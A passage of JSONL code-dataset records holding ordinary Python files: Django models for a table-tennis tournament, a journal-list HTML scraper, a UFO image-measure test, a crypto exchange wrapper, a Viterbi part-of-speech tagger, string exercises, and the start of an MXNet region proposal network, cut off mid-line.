(0, _(\"Male\")),\n (1, _(\"Female\")),\n)\n\n\nclass Player(models.Model):\n class Meta:\n verbose_name = _(\"player\")\n verbose_name_plural = _(\"players\")\n\n name = models.CharField(_(\"name\"), max_length=50)\n surname = models.CharField(_(\"surname\"), max_length=50)\n\n gender = models.IntegerField(_(\"gender\"), choices=GENDER_CHOICES, null=True)\n\n club = models.CharField(_(\"club\"), max_length=50, blank=True)\n category = models.ForeignKey('Category', verbose_name=_(\"category\"), related_name='players', blank=True, null=True)\n\n def save(self, *args, **kwargs):\n self.fill_gender()\n\n super(Player, self).save(*args, **kwargs)\n\n def fill_gender(self):\n if self.category is None:\n return\n\n if self.gender is None:\n self.gender = self.category.gender\n\n def __unicode__(self):\n return self.full_name()\n\n def full_name(self):\n return u\"{} {}\".format(self.surname, self.name)\n\n full_name.admin_order_field = 'surname'\n\n\nclass Category(models.Model):\n SINGLE = 0\n DOUBLE = 1\n TYPE_CHOICES = (\n (SINGLE, _(\"Single\")),\n (DOUBLE, _(\"Double\")),\n )\n\n class Meta:\n verbose_name = _(\"category\")\n verbose_name_plural = _(\"categories\")\n\n name = models.CharField(_(\"name\"), max_length=10)\n description = models.CharField(_(\"description\"), max_length=50, blank=True)\n\n type = models.IntegerField(_(\"type\"), choices=TYPE_CHOICES, default=0)\n\n gender = models.IntegerField(_(\"gender\"), choices=GENDER_CHOICES, null=True)\n min_age = models.IntegerField(_(\"min age\"), blank=True, null=True)\n max_age = models.IntegerField(_(\"max age\"), blank=True, null=True)\n\n def create_groups(self, leaders=(), number_of_groups=0):\n Group.objects.filter(category=self).delete()\n\n if number_of_groups == 0:\n number_of_groups = len(leaders)\n\n if number_of_groups == 0:\n raise ValueError(\"You have to specify leaders or non zero number of groups.\")\n\n groups = [Group.objects.create(name=string.ascii_uppercase[i], category=self)\n for i in range(number_of_groups)]\n has_leader = {group: False for group in groups}\n clubs = {group: set() for group in groups}\n members = []\n\n leader_ids = set(l.id for l in leaders)\n other_players = list(shuffled(self.players.exclude(id__in=leader_ids)))\n first_skipped_player = None\n group_iterator = iter(cycle(groups))\n group = next(group_iterator)\n for player in chain(leaders, other_players):\n if player in leaders or player == first_skipped_player or player.club not in clubs[group]:\n is_leader = not has_leader[group]\n if is_leader:\n has_leader[group] = True\n members.append(GroupMember(player=player, group=group, leader=is_leader))\n if player.club:\n clubs[group].add(player.club)\n first_skipped_player = None\n group = next(group_iterator)\n else:\n if first_skipped_player is None:\n first_skipped_player = player\n other_players.append(player)\n\n GroupMember.objects.bulk_create(members)\n group_members = defaultdict(list)\n for member in GroupMember.objects.filter(group__category=self).select_related('group'):\n group_members[member.group].append(member)\n\n matches = []\n for group in groups:\n for p1, p2 in berger_tables(len(group_members[group])):\n matches.append(Match(player1=group_members[group][p1].player,\n player2=group_members[group][p2].player,\n group=group,\n status=Match.PENDING))\n\n # Create a dummy match that will be used to assign table to the group.\n matches.append(Match(group=group, status=Match.READY))\n Match.objects.bulk_create(matches)\n\n def __unicode__(self):\n return self.name\n\n\nclass Table(models.Model):\n name = models.CharField(max_length=50)\n short_name = models.CharField(max_length=10, default=\"\")\n display_order = models.IntegerField()\n\n def __unicode__(self):\n return self.name\n\n _players = None\n\n @property\n def players(self):\n if self._players is None:\n if self.bracketslot_set.exists():\n self._players = sorted([bracket.player for bracket in self.bracketslot_set.all()],\n key=lambda x: x.id if hasattr(x, 'id') else '')\n elif self.group_set.exists():\n group = self.group_set.all()[0]\n self._players = group.category.description, group.name\n else:\n self._players = ('', '')\n\n return self._players\n\n def player1(self):\n return self.players[0]\n\n def player2(self):\n return self.players[1]\n\n def occupied(self):\n return self.players != ('', '')\n\n def match_started(self):\n if self.bracketslot_set.exists():\n return self.bracketslot_set.all()[0].match_start.strftime('%H:%M')\n else:\n return ''\n\n _current_matches = None\n\n def current_matches(self):\n if self._current_matches is None:\n self._current_matches = self.all_matches.filter(status=Match.PLAYING)\n return self._current_matches\n\n\nclass Match(models.Model):\n PENDING = 0\n READY = 1\n PLAYING = 2\n COMPLETE = 3\n DOUBLE = 4\n\n STATUS_CHOICES = (\n (PENDING, 'Pending'),\n (READY, 'Ready'),\n (PLAYING, 'Playing'),\n (COMPLETE, 'Complete'),\n (COMPLETE, 'Double'),\n )\n\n class Meta:\n verbose_name = _(\"Match\")\n verbose_name_plural = _(\"Matches\")\n\n status = models.IntegerField(choices=STATUS_CHOICES, default=0)\n\n group = models.ForeignKey('Group', null=True)\n\n player1 = models.ForeignKey(Player, null=True, related_name='match_as_player1')\n player1_score = models.IntegerField(null=True)\n player1_bracket_slot = models.ForeignKey('BracketSlot', null=True, related_name='+')\n\n player2 = models.ForeignKey(Player, null=True, related_name='match_as_player2')\n player2_score = models.IntegerField(null=True)\n player2_bracket_slot = models.ForeignKey('BracketSlot', null=True, related_name='+')\n\n table = models.ForeignKey(Table, blank=True, null=True, related_name='all_matches')\n\n ready_time = models.DateTimeField(null=True)\n start_time = models.DateTimeField(null=True)\n end_time = models.DateTimeField(null=True)\n\n def set_score(self, player1_score, player2_score):\n self.player1_score = player1_score\n self.player2_score = player2_score\n self.player1_bracket_slot.score = player1_score\n self.player1_bracket_slot.save()\n self.player2_bracket_slot.score = player2_score\n self.player2_bracket_slot.save()\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n if self.status == Match.PENDING:\n if self.player1_id and self.player2_id:\n self.status = Match.READY\n elif self.status == Match.READY or self.status == Match.DOUBLE:\n if self.table_id is not None:\n self.start_time = now()\n self.status = Match.PLAYING\n elif self.status == Match.PLAYING:\n if self.player1_score is not None and self.player2_score is not None:\n if self.player1_bracket_slot_id:\n self.player1_bracket_slot.score = self.player1_score\n self.player1_bracket_slot.save()\n if self.player2_bracket_slot_id:\n self.player2_bracket_slot.score = self.player2_score\n self.player2_bracket_slot.save()\n self.end_time = now()\n self.status = Match.COMPLETE\n super(Match, self).save(force_insert, force_update, using, update_fields)\n\n @staticmethod\n def ready_group_matches():\n group_matches = Match.objects.filter(status=Match.READY, group__isnull=False)\n return group_matches.select_related('group', 'group__category')\n\n @staticmethod\n def ready_bracket_matches():\n return Match.objects \\\n .filter(status=Match.READY, group__isnull=True) \\\n .order_by('id') \\\n .select_related('player1', 'player1__category', 'player1_bracket_slot__bracket',\n 'player2') \\\n\n @staticmethod\n def ready_doubles_matches():\n occupied_with_singles = Double.objects.filter(\n Q(player1__match_as_player1__status__lt=Match.COMPLETE) |\n Q(player1__match_as_player2__status__lt=Match.COMPLETE) |\n Q(player2__match_as_player1__status__lt=Match.COMPLETE) |\n Q(player2__match_as_player2__status__lt=Match.COMPLETE)).values('id')\n\n return Match.objects.filter(status=Match.DOUBLE).exclude(\n Q(player1__isnull=True) | Q(player2__isnull=True) |\n Q(player1__in=occupied_with_singles) |\n Q(player2__in=occupied_with_singles)).select_related('player1', 'player1__double',\n 'player1__category',\n 'player2', 'player2__double',\n 'player1_bracket_slot__bracket')\n\n @staticmethod\n def current_matches():\n return Match.objects.filter(status=Match.PLAYING, group__isnull=True)\n\n def description(self):\n if self.group is not None:\n return unicode(self.group)\n elif self.player1 and self.player2:\n b = self.player1_bracket_slot.bracket.name[0]\n l = self.player1_bracket_slot.level\n c = self.player1.category.name\n return mark_safe(u'%s %s %s %s : %s' % (b, l, c, self.player1, self.player2))\n else:\n return u\"\"\n\n def __unicode__(self):\n return u'%s %s' % (self.player1, self.player2)\n\n\nclass Double(Player):\n player1 = models.ForeignKey(Player, related_name='+')\n player2 = models.ForeignKey(Player, related_name='+')\n\n def save(self, *args, **kwargs):\n self.name = '%s. %s' % (self.player1.name[0], self.player1.surname)\n self.surname = '%s. %s' % (self.player2.name[0], self.player2.surname)\n super(Double, self).save(*args, **kwargs)\n\n\nclass Group(models.Model):\n STATUS = (\n (0, ''),\n (1, 'playing'),\n (2, 'completed')\n )\n\n name = models.CharField(max_length=10)\n category = models.ForeignKey(Category)\n\n table = models.ForeignKey(Table, blank=True, null=True)\n status = models.IntegerField(choices=STATUS, default=0)\n\n @property\n def members(self):\n return GroupMember.objects.filter(group=self) \\\n .order_by('place', '-leader', 'player__surname') \\\n .select_related('group', 'group__category', 'player')\n\n @property\n def match(self):\n return Match.objects.filter(group=self, player1=None, player2=None)\n\n def assign_table(self, table):\n Match.objects.filter(group=self).update(table=table,\n status=Match.PLAYING,\n start_time=now())\n\n def __unicode__(self):\n return u'{} - Skupina {}'.format(self.category, self.name)\n\n\nclass GroupMember(models.Model):\n player = models.ForeignKey(Player)\n group = models.ForeignKey(Group, related_name='members')\n\n place = models.IntegerField(blank=True, null=True)\n leader = models.BooleanField(default=False)\n\n @classmethod\n def for_category(cls, category):\n return cls.objects.filter(group__category=category) \\\n .order_by('group', 'place', '-leader', 'player__surname') \\\n .prefetch_related('group', 'group__category', 'player')\n\n @classmethod\n def for_group(cls, group):\n return cls.objects.filter(group=group) \\\n .order_by('-leader', 'player__surname') \\\n .prefetch_related('player')\n\n def __unicode__(self):\n return unicode(self.player)\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n super(GroupMember, self).save(force_insert, force_update, using, update_fields)\n\n if self.place:\n for slot in BracketSlot.objects.filter(transition__group=self.group_id, transition__place=self.place):\n slot.player_id = self.player_id\n slot.save()\n\n\nclass KnownPlayer(models.Model):\n name = models.CharField(_(\"name\"), max_length=50)\n search_name = models.CharField(_(\"searchable name\"), max_length=50)\n surname = models.CharField(_(\"surname\"), max_length=50)\n search_surname = models.CharField(_(\"searchable surname\"), max_length=50)\n club = models.CharField(_(\"club\"), max_length=50, blank=True)\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n if update_generated_value(self, 'name', 'search_name'):\n self.search_name = unidecode(self.name)\n if update_generated_value(self, 'surname', 'search_surname'):\n self.search_surname = unidecode(self.surname)\n super(KnownPlayer, self).save(force_insert, force_update, using, update_fields)\n\n def __unicode__(self):\n return u'%s %s [%s]' % (self.name, self.surname, self.club)\n\n\nclass KnownClub(models.Model):\n name = models.CharField(_(\"name\"), max_length=50)\n search_name = models.CharField(_(\"searchable name\"), max_length=50)\n\n def save(self, force_insert=False, force_update=False, using=None,\n update_fields=None):\n if update_generated_value(self, 'name', 'search_name'):\n self.search_name = unidecode(self.name)\n super(KnownClub, self).save(force_insert, force_update, using, update_fields)\n\n def __unicode__(self):\n return self.name\n\n\ndef update_generated_value(model, field, cleaned_field):\n new_value = getattr(model, field, \"\")\n cleaned_new_value = getattr(model, cleaned_field, \"\")\n if not cleaned_new_value:\n return True\n\n if model.pk is None:\n return False\n old_model = model.__class__.objects.get(pk=model.pk)\n old_value = getattr(old_model, field, \"\")\n cleaned_old_value = getattr(old_model, cleaned_field, \"\")\n\n if new_value == old_value:\n return False\n\n if cleaned_old_value == unidecode(old_value):\n if cleaned_new_value == cleaned_old_value:\n return True\n return False\n\n\nclass Bracket(models.Model):\n category = models.ForeignKey(Category)\n name = models.CharField(max_length=100)\n description = models.CharField(max_length=50)\n\n levels = models.IntegerField(default=0)\n\n def __unicode__(self):\n return '%s - %s' % (self.category.name, self.name)\n\n\nclass BracketSlot(models.Model):\n STATUS = (\n (0, ''),\n (1, 'playing'),\n (2, 'completed')\n )\n\n bracket = models.ForeignKey(Bracket)\n level = models.IntegerField()\n status = models.IntegerField(choices=STATUS, default=0)\n\n no_player = models.BooleanField(default=False)\n player = models.ForeignKey(Player, blank=True, null=True)\n table = models.ForeignKey(Table, blank=True, null=True)\n score = models.IntegerField(null=True, blank=True)\n\n match_start = models.DateTimeField(null=True, blank=True)\n match_end = models.DateTimeField(null=True, blank=True)\n\n winner_goes_to = models.ForeignKey('BracketSlot', null=True, blank=True, related_name='winner_set')\n loser_goes_to = models.ForeignKey('BracketSlot', null=True, blank=True, related_name='loser_set')\n\n def save(self, *args, **kwargs):\n self.set_status()\n super(BracketSlot, self).save(*args, **kwargs)\n\n if self.player_id:\n for match in Match.objects.filter(player1_bracket_slot=self):\n if match.player1_id != self.player_id:\n match.player1_id = self.player_id\n match.save()\n for match in Match.objects.filter(player2_bracket_slot=self):\n if match.player2_id != self.player_id:\n match.player2_id = self.player_id\n match.save()\n self.advance_player()\n\n def set_status(self):\n if self.table_id is not None and self.status != 1:\n self.status = 1\n self.match_start = timezone.now()\n\n if self.score is not None and self.status != 2:\n self.table = None\n self.status = 2\n self.match_end = timezone.now()\n\n if self.level == 0 and self.player_id is not None:\n self.status = 2\n\n def advance_player(self):\n if self.player_id is None:\n return\n other = BracketSlot.objects.exclude(id=self.id) \\\n .filter(winner_goes_to=self.winner_goes_to) \\\n .select_related('winner_goes_to', 'loser_goes_to')[0]\n if other.no_player:\n other.winner_goes_to.player_id = self.player_id\n other.winner_goes_to.save()\n\n if self.score is not None and other.score is not None:\n first, last = (self, other) if self.score > other.score else (other, self)\n if first.winner_goes_to is not None:\n first.winner_goes_to.player_id = first.player_id\n first.winner_goes_to.save()\n if last.loser_goes_to is not None:\n last.loser_goes_to.player_id = last.player_id\n last.loser_goes_to.save()\n\n def label(self):\n try:\n transition = '%s%s' % (self.transition.group.name, self.transition.place)\n except GroupToBracketTransition.DoesNotExist:\n transition = ' '\n try:\n player = self.player.full_name() if self.player is not None else ' '\n except Player.DoesNotExist:\n player = ' '\n\n return transition, player\n\n def empty(self):\n return self.transition is None and self.player is None\n\n def get_admin_url(self):\n return reverse(\"admin:%s_%s_change\" % (self._meta.app_label, self._meta.module_name), args=(self.id,))\n\n def __unicode__(self):\n return '%s' % self.id\n\n\nclass GroupToBracketTransition(models.Model):\n group = models.ForeignKey(Group)\n place = models.IntegerField()\n\n slot = models.OneToOneField(BracketSlot, related_name='transition')\n\n def __unicode__(self):\n return '%s%s' % (self.group.name, self.place)\n","sub_path":"pingpong/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"459142150","text":"import csv\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\n\r\n#This project takes a HTML webpage consisting of book information and returns a list of them in a csv file based on the subject matter. \r\n\r\nin_F = open(\"ProQuestDocuments-2018-09-20.html\", \"r\")\r\nout_F = open(\"Results.csv\", \"w\")\r\n\r\nsoup = BeautifulSoup(in_F, 'html.parser')\r\nbooks = soup.find_all(\"div\")\r\nbookInfo = []\r\nfor item in books:\r\n\ttitle = ''\r\n\tauthor = ''\r\n\tpubYear = ''\r\n\tISSN = ''\r\n\tattributes = item.find_all(\"p\")\r\n\ttitle = attributes[1].getText()\r\n\tfor para in attributes:\r\n\t\tif(re.search(\"Correspondence author\", para.getText())):\r\n\t\t\tauthor = para.getText().replace(\"Correspondence author: \",\"\")\r\n\t\tif(re.search(\"Publication year\", para.getText())):\r\n\t\t\tpubYear = para.getText().replace(\"Publication year: \",\"\")\r\n\t\tif(re.search(\"ISSN\", para.getText())):\r\n\t\t\tISSN = para.getText().replace(\"ISSN: \",\"\")\r\n\tbookInfo.append([title, author, pubYear, ISSN])\r\nlistWriter = csv.writer(out_F, delimiter=',')\r\nlistWriter.writerow(['Title', 'Correspondence Author', 'Publication Year', 'ISSN'])\r\nfor book in bookInfo:\r\n\tlistWriter.writerow([book[0], book[1], book[2], book[3]])\r\nout_F.close()\r\nin_F.close()","sub_path":"Book List Scraper/Source/JournalListScraper.py","file_name":"JournalListScraper.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"455308007","text":"from message import Message\nclass Sms(Message):\n nl = '\\n'\n def __init__(self):\n self.nr_od = 505050505\n self.nr_do = 707070707\n self.temat = 'temat'\n def send(self):\n print(f'Od: {self.nr_od}{Sms.nl}Do: {self.nr_do}{Sms.nl}Temat: {self.temat}{Sms.nl}Tresc: {self.message}')\n\nx = Sms()\nx.set_message('witam panstwa, witam')\nx.send()\n","sub_path":"07-ObjectOrientedProgramming/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"348788362","text":"import sys\nimport numpy as np\nimport tifffile\nimport gi\nimport ufo.numpy\ngi.require_version('Ufo', '0.0')\nfrom gi.repository import Ufo\n\n\ndef write_image(path, image):\n try:\n image[0]\n except:\n image = [image]\n tifffile.imsave(path, np.array([image]).astype(np.float32))\n\n\ndef make_input(width, height):\n # Mean is not zero, so skew and kurtosis will work\n return np.linspace(0, 1, num=width * height).reshape(height, width).astype(np.float32) ** 2\n\n\ndef measure_numpy(path, metric, axis, width, height):\n image = make_input(width, height).astype(np.float)\n\n if metric == 'skew':\n from scipy.stats import skew\n func = skew\n elif metric == 'kurtosis':\n from scipy.stats import kurtosis\n func = kurtosis\n else:\n func = getattr(np, metric)\n\n result = func(image, axis=1 - axis if axis != -1 else None)\n write_image(path, result)\n\n\ndef measure_ufo(out_path, metric, axis, width, height):\n pm = Ufo.PluginManager()\n sched = Ufo.Scheduler()\n graph = Ufo.TaskGraph()\n input_path = 'data/measure.tif'\n\n image = make_input(width, height)\n tifffile.imsave(input_path, image)\n\n reader = pm.get_task('read')\n measure = pm.get_task('measure')\n output = Ufo.OutputTask()\n\n reader.props.path = input_path\n measure.props.axis = axis\n measure.props.metric = metric\n\n graph.connect_nodes(reader, measure)\n graph.connect_nodes(measure, output)\n\n sched.run(graph)\n\n buf = output.get_output_buffer()\n gpu_result = ufo.numpy.asarray(buf)\n write_image(out_path, gpu_result)\n\n\ndef main():\n reference_path, out_path, metric, axis, width, height = sys.argv[1:]\n axis = int(axis)\n width = int(width)\n height = int(height)\n\n try:\n measure_numpy(reference_path, metric, axis, width, height)\n measure_ufo(out_path, metric, axis, width, height)\n except Exception as e:\n sys.stderr.write(str(e))\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test-measure.py","file_name":"test-measure.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"375175604","text":"import time\nclass CryptoExchange:\n\n def __init__(self, exchange):\n self.exchange = exchange\n self.exchange.load_markets()\n\n def fetch_ticker(self, symbol):\n #re-try in case of exception\n num_tries = 0\n while (1 and num_tries < 5):\n try:\n value = self.exchange.fetch_ticker(symbol=symbol)\n break\n except:\n message = \"exception in fetch_ticker, 'sleeping for...', 0.5, ' sec'\\n\"\n print(message)\n time.sleep(0.5)\n num_tries = num_tries + 1\n continue\n return value\n\n #add methods to execute orders!!\n","sub_path":"Exchange.py","file_name":"Exchange.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"420967115","text":"#字符串初始用\nwhat_he_does = ' plays '\nhis_instrument = 'guitar'\nhis_name = 'Robert Johnson'\nartist_intro = his_name + what_he_does + his_instrument\n\nprint(artist_intro)\n\n#字符串与数字混用\nnum = 1\nstringNum = '9'\nnum2 = int(stringNum)\n\nprint(num + num2)\n\n#字符串相乘\nwords = 'word ' * 3\nprint(words)\n\n#字符串分片与索引,[0:n]表示的是从0到n-1个数\nname = 'My name is marco'\nprint(name[-1])\nprint(name[:-1])\n\n#game\nword = 'friends'\nfind_the_evil_in_your_friends = word[0]+word[2:4]+word[-3:-1]\nprint(find_the_evil_in_your_friends)\n\n#字符串命名处理\nurl = 'http://ww1.site.cn/14d2e8ejw1exjogbxdxhj20ci0kuwex.jpg'\nfile_name = url[-10:]\nprint(file_name)","sub_path":"exercise_bak/5_Python/0_PythonGramLearn/1-chars.py","file_name":"1-chars.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"299812534","text":"# Currently reads in the names of the training files, test file and output file,\r\n# and calls the tagger (which you need to implement)\r\nimport os\r\nimport sys\r\nimport re\r\nimport math\r\nimport numpy as np\r\n\r\n#this is vanilla viberti taught in lecture\r\n#take log for the probability before nomalizing, and preload all probablilies with 0.01 to avoid all zero columns.\r\n#this implementation currently does not use numpy... so it has efficiency issues. But it runs within a minute on my machine, so hopefully it isnt too slow...\r\n#reads sentences, and does tagging for every .!;? (which must be PUN) to mitigate some efficiency issues.\r\n#preloads some symbols that are repeatly misclassified\r\n#have an accuracy of around 80%... a bit far from 90% but this is best I can do(already late)\r\n\r\n#A is transition matrix, B is emission matrix,P is the initial probability \r\n#assume there are no more than 200000 distinct words in both training and test.\r\n\r\ntaglist = [\"AJ0\",\"AJC\",\"AJS\",\"AT0\",\"AV0\",\"AVP\",\"AVQ\",\"CJC\",\"CJS\",\"CJT\",\"CRD\",\"DPS\",\"DT0\",\"DTQ\",\"EX0\",\"ITJ\",\"NN0\",\"NN1\",\"NN2\",\"NP0\",\"ORD\",\"PNI\",\"PNP\",\"PNQ\",\"PNX\",\"POS\",\"PRF\",\"PRP\",\"PUL\",\"PUN\",\"PUQ\",\"PUR\",\"TO0\",\"UNC\",\"VBB\",\"VBD\",\"VBG\",\"VBI\",\"VBN\",\"VBZ\",\"VDB\",\"VDD\",\"VDG\",\"VDI\",\"VDN\",\"VDZ\",\"VHB\",\"VHD\",\"VHG\",\"VHI\",\"VHN\",\"VHZ\",\"VM0\",\"VVB\",\"VVD\",\"VVG\",\"VVI\",\"VVN\",\"VVZ\",\"XX0\",\"ZZ0\",\"AJ0-NN1\",\"AJ0-VVD\",\"AJ0-VVG\",\"AJ0-VVN\",\"AV0-AJ0\",\"AVP-PRP\",\"AVQ-CJS\",\"CJS-AVQ\",\"CJS-PRP\",\"CJT-DT0\",\"CRD-PNI\",\"DT0-CJT\",\"NN1-AJ0\",\"NN1-NP0\",\"NN1-VVB\",\"NN1-VVG\",\"NN2-VVZ\",\"NP0-NN1\",\"PNI-CRD\",\"PRP-AVP\",\"PRP-CJS\",\"VVB-NN1\",\"VVD-AJ0\",\"VVD-VVN\",\"VVG-AJ0\",\"VVG-NN1\",\"VVN-AJ0\",\"VVN-VVD\",\"VVZ-NN2\",\"AJ0-AV0\"]\r\ntagdict = {}\r\nreversedict = {}\r\nworddict = {}\r\n#preloaded tags, to be built manually\r\npreload = {\"a\":\"AT0\",\"that\":\"CJT\",\"of\":\"PRF\",\"at\":\"PRP\",\"the\":\"AT0\",\",\":\"PUN\",\"had\":\"VHD\",\"there\":\"EX0\",\"was\":\"VBD\",\"he\":\"PNP\",\"with\":\"PRP\",\"to\":\"TO0\",\"both\":\"AV0\",\"all\":\"DT0\",\"around\":\"AVP\",\"on\":\"PRP\",\"him\":\"PNP\",\"for\":\"CJS\",\"now\":\"AV0\",\"make\":\"VVI\",\"before\":\"AV0\",\"about\":\"PRP\",\"one\":\"CRD\",\"it\":\"PNP\"}\r\n\r\nA = []\r\nB = []\r\nP = []\r\ncountP = 0\r\ncountA = []\r\ncountB = []\r\nnumwords = 0\r\n\r\nprob_trellis = []\r\npath_trellis = []\r\n\r\ndef train(training_file):\r\n global countP\r\n global numwords\r\n rd = open(training_file,\"r\",errors='replace')\r\n outList = rd.readlines()\r\n last = None\r\n for line in outList:\r\n split = line.split()\r\n word = split[0]\r\n tag = split[2]\r\n if(len(split)>2):\r\n split = line.split(\" : \")\r\n word = split[0]\r\n tag = split[1].split()[0]\r\n #update P\r\n #print(tag)\r\n i = tagdict.get(tag)\r\n P[i]+= 1\r\n countP+=1\r\n #update A\r\n if(last!=None):\r\n A[tagdict.get(last)][tagdict.get(tag)]+=1\r\n countA[tagdict.get(last)]+=1\r\n last = tag\r\n #update B\r\n wordindex = worddict.get(word,-1)\r\n if(wordindex==-1):\r\n worddict.update({word:numwords})\r\n wordindex = numwords\r\n numwords+=1\r\n countB[tagdict.get(tag)]+=1\r\n B[tagdict.get(tag)][wordindex]+=1\r\n\r\n#find the most probable word lists\r\n#path_trellis is an array of numbers,translate it into word tags. \r\ndef findx(s,num,obs):\r\n maxprob = 0\r\n maxindex = -1\r\n for x in range(len(taglist)):\r\n prob = prob_trellis[x][num-1]*A[x][s]*B[s][obs]\r\n if(prob>maxprob):\r\n maxprob = prob\r\n maxindex = x\r\n return maxindex\r\n\r\n \r\ndef findmax(prob_trellis,index):\r\n maxprob = 0\r\n maxindex = 0\r\n for x in range(len(taglist)):\r\n prob = prob_trellis[x][index]\r\n if(prob>=maxprob):\r\n maxprob = prob\r\n maxindex = x\r\n return maxindex\r\n\r\n#clean a,b,p\r\ndef clean():\r\n #total = []\r\n for i in range(len(P)):\r\n P[i] = P[i]/countP\r\n\r\n for i in range(len(tagdict)):\r\n sumB = 0\r\n for j in range(len(tagdict)):\r\n if(countA[i]==0):\r\n A[i][j]=0.000001\r\n continue\r\n A[i][j] = A[i][j]/countA[i]\r\n\r\n for j in range(len(worddict)):\r\n if(countB[i]==0):\r\n B[i][j]=0.000001\r\n continue\r\n B[i][j] = B[i][j]/countB[i]\r\n\r\n #print(total)\r\n \r\ndef v_sentence(sentence,wr,punctuation):\r\n\r\n default = worddict.get(sentence[0])\r\n if default == None:\r\n default = 19\r\n\r\n for s in range(len(taglist)):\r\n #print(P[s] * B[s][worddict.get(outList[0],-1)])\r\n #print(counttag[s])\r\n prob_trellis[s][0] = P[s] * B[s][default]\r\n path_trellis[s][0] = [s]\r\n #handle never-before-seen words\r\n #print(prob_trellis[s][0])\r\n #for s in range(len(taglist)):\r\n # print(B[s][worddict.get(outList[0])])\r\n\r\n # o is the item number, obs is the observation\r\n for num in range(1,len(sentence)):\r\n #if it is one of our preloads\r\n\r\n obs = worddict.get(sentence[num])\r\n \r\n\r\n if(obs==None):\r\n obs = default\r\n\r\n total = 0\r\n for s in range(len(taglist)):\r\n\r\n if preload.get(sentence[num-1])!=None:\r\n tag = preload.get(sentence[num-1])\r\n x = tagdict.get(tag)\r\n \r\n else:\r\n x = findx(s,num,obs)\r\n\r\n if(x==-1):\r\n print(sentence)\r\n print(num)\r\n exit()\r\n\r\n #every round, not every state can be reached by some other state\r\n prob_trellis[s][num] = prob_trellis[x][num-1]*A[x][s]*B[s][obs]\r\n total += prob_trellis[s][num]\r\n new_path = list(path_trellis[x][num-1])\r\n new_path.append(s)\r\n path_trellis[s][num] = new_path\r\n #nomalize prob_trellis[s][num]\r\n for s in range(len(taglist)):\r\n prob_trellis[s][num] = prob_trellis[s][num]/total\r\n\r\n #for s in range(len(taglist)):\r\n # print(path_trellis[s][num])\r\n\r\n maxnum = findmax(prob_trellis,len(sentence)-1)\r\n writesentence(path_trellis[maxnum][len(sentence)-1],wr,sentence,punctuation)\r\n\r\ndef viberti(test_file,output_file):\r\n global numwords\r\n rd = open(test_file,\"r\")\r\n wr = open(output_file,\"w\")\r\n outList = rd.readlines()\r\n #clean the outlist\r\n for i in range(len(outList)):\r\n outList[i] = outList[i][:len(outList[i])-1]\r\n \r\n #print(outList)\r\n\r\n sentence = []\r\n for item in outList:\r\n if item == '.' or item == '!' or item == '?' or item == ';':\r\n v_sentence(sentence,wr,item)\r\n sentence = []\r\n else:\r\n sentence.append(item)\r\n\r\n\r\n#write the calculated word list to output\r\ndef writesentence(output,wr,sentence,punctuation):\r\n for i in range(len(output)):\r\n wr.write(sentence[i]+' : '+reversedict.get(output[i])+'\\n')\r\n wr.write(punctuation+' : '+'PUN'+'\\n')\r\n\r\ndef word(training_list, test_file, output_file):\r\n # Tag the words from the untagged input file and write them into the output file.\r\n # Doesn't do much else beyond that yet.\r\n print(\"Tagging the file.\")\r\n #\r\n # YOUR IMPLEMENTATION GOES HERE\r\n #\r\n for i in range(len(taglist)):\r\n tagdict.update({taglist[i]:i})\r\n reversedict.update({i:taglist[i]})\r\n\r\n for i in range(len(taglist)):\r\n P.append(0.01)\r\n countA.append(0.0)\r\n countB.append(0.0)\r\n temp = []\r\n for j in range(len(taglist)):\r\n temp.append(0.01)\r\n A.append(temp)\r\n\r\n temp = []\r\n for j in range(200000):\r\n temp.append(0.01)\r\n B.append(temp)\r\n prob_trellis.append(temp)\r\n\r\n temp = []\r\n for j in range(200000):\r\n temp.append([])\r\n path_trellis.append(temp)\r\n\r\n #print(len(B))\r\n #print(len(B[0]))\r\n\r\n for training_file in training_list:\r\n train(training_file)\r\n\r\n clean()\r\n viberti(test_file,output_file)\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n # Run the tagger function.\r\n print(\"Starting the tagging process.\")\r\n\r\n # Tagger expects the input call: \"python3 tagger.py -d -t -o \"\r\n parameters = sys.argv\r\n training_list = parameters[parameters.index(\"-d\")+1:parameters.index(\"-t\")]\r\n test_file = parameters[parameters.index(\"-t\")+1]\r\n output_file = parameters[parameters.index(\"-o\")+1]\r\n # print(\"Training files: \" + str(training_list))\r\n # print(\"Test file: \" + test_file)\r\n # print(\"Ouptut file: \" + output_file)\r\n\r\n # Start the training and tagging operation.\r\n word (training_list, test_file, output_file)","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":8543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"418603017","text":"#!/usr/bin/python3\n# Copyright 2017, Mengxiao Lin \n\n\"\"\"\nRPN: Region Proposal Network\n\"\"\"\n\nimport mxnet as mx\n\ndef setConvWeights(lv: mx.gluon.nn.Conv2D, rv: mx.gluon.nn.Conv2D):\n lv.weight.set_data(rv.weight.data())\n lv.bias.set_data(rv.bias.data())\n\nclass RPNFeatureExtractor(mx.gluon.Block):\n def __init__(self, **kwargs):\n super(RPNFeatureExtractor, self).__init__(**kwargs)\n self.conv1_1 = mx.gluon.nn.Conv2D(channels=64, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=3, activation='relu')\n self.conv1_2 = mx.gluon.nn.Conv2D(channels=64, kernel_size=(3, 3), strides=(1, 1), padding=(1, 